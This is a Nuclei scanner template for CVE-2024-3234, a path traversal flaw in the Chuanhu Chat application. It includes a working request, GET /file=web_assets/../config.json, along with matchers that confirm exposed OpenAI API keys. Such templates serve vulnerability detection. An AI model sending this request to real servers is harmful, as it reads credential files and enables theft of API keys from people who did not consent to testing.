CVE-2024-3234: Chuanhu Chat - Directory Traversal

id: CVE-2024-3234

info:
  name: Chuanhu Chat - Directory Traversal
  author: DhiyaneshDk
  severity: critical
  description: |
    The gaizhenbiao/chuanhuchatgpt application is vulnerable to a path traversal attack due to its use of an outdated gradio component. The application is designed to restrict user access to resources within the `web_assets` folder. However, the outdated version of gradio it employs is susceptible to path traversal, as identified in CVE-2023-51449. This vulnerability allows unauthorized users to bypass the intended restrictions and access sensitive files, such as `config.json`, which contains API keys. The issue affects the latest version of chuanhuchatgpt prior to the fixed version released on 20240305.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-3234
    cwe-id: CWE-22
    epss-score: 0.69547
    epss-percentile: 0.98584
    cpe: cpe:2.3:a:gaizhenbiao:chuanhuchatgpt:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: gaizhenbiao
    product: chuanhuchatgpt
  tags: cve,cve2024,chuanhuchatgpt,lfi,vuln

http:
  - raw:
      - |
        GET /file=web_assets/../config.json HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"openai_api_key":'
          - '"openai_api_type":'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ceda48616f3d53c551e403a838bdc116c69a2bc76c1f1ff45e4c24ce43ae257b02200d2f4ab4ccd0a1eda1408279faa15eea55e63ddbc2e8285dfddd6b843883982e:922c64590222798bb761d5b6d8e72950